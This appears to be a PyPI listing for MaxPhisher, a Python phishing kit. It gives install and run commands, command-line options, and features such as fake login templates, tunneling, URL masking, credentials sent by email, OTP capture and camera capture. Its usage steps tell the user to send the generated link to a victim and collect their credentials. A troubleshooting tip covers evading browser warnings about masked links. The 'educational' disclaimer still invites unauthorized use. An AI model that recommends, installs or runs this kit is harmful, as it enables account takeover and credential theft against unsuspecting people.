Skip to main content

Ultimate phishing tool in python with dual tunneling, 77 templates and many more!

Project description

MaxPhisher



[√] Description :

A python phishing script for login phishing, image phishing video phishing an many more

[+] Installation

Install primary dependencies (git, python)
  • For Debian (Ubuntu, Kali-Linux, Parrot)
    • sudo apt install git python3 -y
  • For Arch (Manjaro)
    • sudo pacman -S git python3
  • For Redhat(Fedora)
    • sudo dnf install git python3 -y
  • For Termux
    • pkg install git python3 -y
Clone this repository
  • git clone https://github.com/KasRoudra/MaxPhisher
Enter the directory
  • cd MaxPhisher
Install all modules
  • pip3 install -r files/requirements.txt
Run the tool
  • python3 maxphisher.py

Or, directly run

wget https://raw.githubusercontent.com/KasRoudra/MaxPhisher/main/MaxPhisher.py && python3 maxphisher.py

Pip

  • pip3 install maxphisher [For Termux]
  • sudo pip3 install maxphisher [For Linux]
  • maxphisher

Docker

  • sudo docker pull kasroudra/maxphisher
  • sudo docker run --rm -it kasroudra/maxphisher

Options

usage: maxphisher.py [-h] [-p PORT] [-t TYPE] [-o OPTION] [-T TUNNELER]
                     [-r REGION] [-S SUBDOMAIN] [-d DIRECTORY] [-f FEST]
                     [-i YTID] [-u URL] [-s DURATION] [--noupdate]

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  MaxPhisher's server port [Default : 8080]
  -t TYPE, --type TYPE  MaxPhisher's phishing type index [Default : null]
  -o OPTION, --option OPTION
                        MaxPhisher's template index [Default : null]
  -T TUNNELER, --tunneler TUNNELER
                        Tunneler to be chosen while url shortening [Default :
                        Cloudflared]
  -r REGION, --region REGION
                        Region for ngrok and loclx [Default: auto]
  -S SUBDOMAIN, --subdomain SUBDOMAIN
                        Subdomain for ngrok and loclx [Pro Account] (Default:
                        null)
  -d DIRECTORY, --directory DIRECTORY
                        Directory where media files will be saved [Default :
                        /sdcard/Media]
  -f FEST, --fest FEST  Festival name for fest template [Default: Birthday]
  -i YTID, --ytid YTID  Youtube video ID for yttv template [Default :
                        6hHmkInZkMQ (NASA Video)]
  -u URL, --url URL     Redirection url for ip-tracking or login phishing
                        [Default : null]
  -s DURATION, --duration DURATION
                        Media duration while capturing [Default : 5000(ms)]
  --noupdate            Skip update checking [Default : False]

Features:

  • Multi platform (Supports most linux)
  • 100+ templates
  • Concurrent 4 tunneling (Ngrok, Cloudflared and LocalXpose, LocalHostRun)
  • OTP Support
  • Credentials mailing
  • Easy to use
  • Possible error diagnoser
  • Built-in masking of URL
  • Custom masking of URL
  • URL Shadowing
  • Portable file (Can be run from any directory)
  • Get IP Address and many other details along with login credentials

Requirements

  • Python(3)
    • requests
    • bs4
  • PHP
  • SSH
  • 200MB storage

If not found, php, ssh and python modoules will be installed on first run

Tested on

  • Termux
  • Ubuntu
  • Kali-Linux
  • Arch
  • Fedora
  • Manjaro

Usage

  1. Run the script
  2. Choose a Website
  3. Wait sometimes for setting up all
  4. Send the generated link to victim
  5. Wait for victim login. As soon as he/she logs in, credentials will be captured

Example

MaxPhisher

Solution of common issues

  • Some secured browsers like Firefox can warn for '@' prefixed links. You should use pure links or custom link to avoid it
  • Ngrok links require Ngrok token to work. Follow the instructions here to set up ngrok token
  • Some android requires hotspot to start Ngrok or Cloudflared. If you face 'tunneling failed' in android, most probably your hotspot is turned off. Turn it on and keep it on untill you close MaxPhisher
  • If you want mailing credentials then you need to use app password. Visit here and generate an app password, put that in files/email.json. You may need to enable 2FA before it

[!] Disclaimer

This tool is developed for educational purposes. Here it demonstrates how phishing works. If anybody wants to gain unauthorized access to someones social media, he/she may try out this at his/her own risk. You have your own responsibilities and you are liable to any damage or violation of laws by this tool. The author is not responsible for any misuse of MaxPhisher!

This repository is open source to help others. So if you wish to copy, consider giving credit!

Credits:

PyPhisher CamHacker VidPhisher IP-Tracker StromeBreaker Seeker

[~] Find Me on :

  • Github

  • Gmail

  • Facebook

  • Messenger

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

MaxPhisher-1.0.3.tar.gz (58.0 kB view hashes)

Uploaded Source

Built Distribution

MaxPhisher-1.0.3-py3-none-any.whl (37.0 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page